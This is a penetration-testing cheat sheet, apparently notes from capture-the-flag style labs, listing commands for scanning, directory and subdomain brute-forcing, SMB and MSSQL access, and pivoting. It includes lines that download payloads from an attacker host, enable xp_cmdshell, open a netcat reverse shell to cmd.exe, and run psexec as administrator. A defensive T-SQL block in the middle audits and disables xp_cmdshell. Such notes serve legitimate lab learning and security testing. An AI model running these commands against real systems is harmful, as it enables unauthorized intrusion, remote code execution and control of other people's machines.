Commands
cross-compile for x86_64 from an ARM host -> x86_64-linux-gnu-gcc shell.c -o shell
Active Recon
port scan (all ports, service detection) -> nmap -p- --min-rate=1000 -sV [IP]
aggressive scan -> sudo nmap IP -p 80 -A
vulnerability scan -> sudo nmap 10.129.2.28 -p 80 -sV --script vuln
banner grabbing (identify service running on a particular port) -> nmap -sV --script=banner -p21 [IP]
banner grabbing using netcat -> sudo nc -nv -p 53 10.129.18.68 50000 (-p 53 sets the source port, i.e. source port spoofing; -n means no DNS resolution, numerical only)
directory brute-forcing (enumeration) -> gobuster dir -u http://IP -w /usr/share/wordlists/dirb/common.txt
directory brute-forcing with extensions (here .pl) -> gobuster dir -u http://<IP> -w /usr/share/wordlists/dirb/common.txt -x pl
subdomain enumeration via web server -> gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb
subdomain enumeration via DNS queries -> for sub in $(cat /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.inlanefreight.htb @10.129.14.128 | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done
OWASP ZAP
File Transfer
host an HTTP server -> sudo python3 -m http.server 8080
get file to reverse shell -> wget http://10.10.14.1:8000/payload.sh
get file to reverse shell (using curl) -> curl http://10.10.14.1:8000/payload.sh -o payload.sh
PowerShell download from a reverse shell -> powershell -c cd C:\Users\sql_svc\Downloads; wget http://hostIP/nc64.exe -outfile nc64.exe
SMB
list all SMB shares -> smbclient -N -L IP
connect to SMB -> smbclient //server-ip-or-name/share_name -U username
SMB version -> nmap --script smb-os-discovery.nse -p445 10.10.10.40
ftp
connect to ftp -> ftp -p [IP]
NFS
Show Available NFS Shares -> showmount -e 10.129.14.128
SMTP
ssh
login to ssh using private key in file -> ssh -p51646 root@94.237.62.250 -i id_rsa
SQL
connect to Microsoft SQL Server (impacket mssqlclient) -> python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py domain/username@IP -windows-auth
spawn Windows command shell through extended stored procedure of Microsoft SQL Server -> EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'dir C:\';
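The xp_cmdshell sequence above only works because the option is enabled; the T-SQL below is an added example (not from these notes) that audits whether it is on, turns it off, and lists which logins hold the server roles that could turn it back on. It assumes a login with ALTER SETTINGS (sysadmin or serveradmin) and SQL Server 2005 or later, where sys.configurations exists.

```sql
-- Added example, not part of the original notes.
-- Assumes a login holding ALTER SETTINGS (sysadmin / serveradmin).

-- 1. Is xp_cmdshell enabled right now? value_in_use = 1 means yes.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Disable it. 'show advanced options' must be on to touch xp_cmdshell,
--    so it is switched on, the change is made, and it is switched off again.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 3. Who could re-enable it? sp_configure needs ALTER SETTINGS, which the
--    sysadmin and serveradmin roles carry; review every member of both.
SELECT r.name AS server_role, sp.name AS login_name, sp.type_desc
FROM sys.server_role_members rm
JOIN sys.server_principals r  ON r.principal_id  = rm.role_principal_id
JOIN sys.server_principals sp ON sp.principal_id = rm.member_principal_id
WHERE r.name IN ('sysadmin', 'serveradmin')
ORDER BY r.name, sp.name;
```

Every sp_configure change is also written to the SQL Server error log as "Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.", so that line is the first thing to look for when reconstructing whether the sequence above was ever run on a server.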
Reverse Shell
netcat listener for reverse shell -> sudo nc -lvnp 443
PowerShell reverse shell execute -> powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe targetIP 443
Miscellaneous
Local port forwarding: lets the local client reach a service on the remote server as if it were running on the local machine (here remote port 5432 becomes local port 1234). -> ssh -L 1234:localhost:5432 christine@{target_IP}
map a domain name to an IP address in /etc/hosts -> echo "10.129.67.241 ns1.inlanefreight.htb" | sudo tee -a /etc/hosts
Windows PowerShell history location -> cd AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine\
login to a remote Windows host (impacket psexec) -> sudo python3 psexec.py administrator@<target-ip>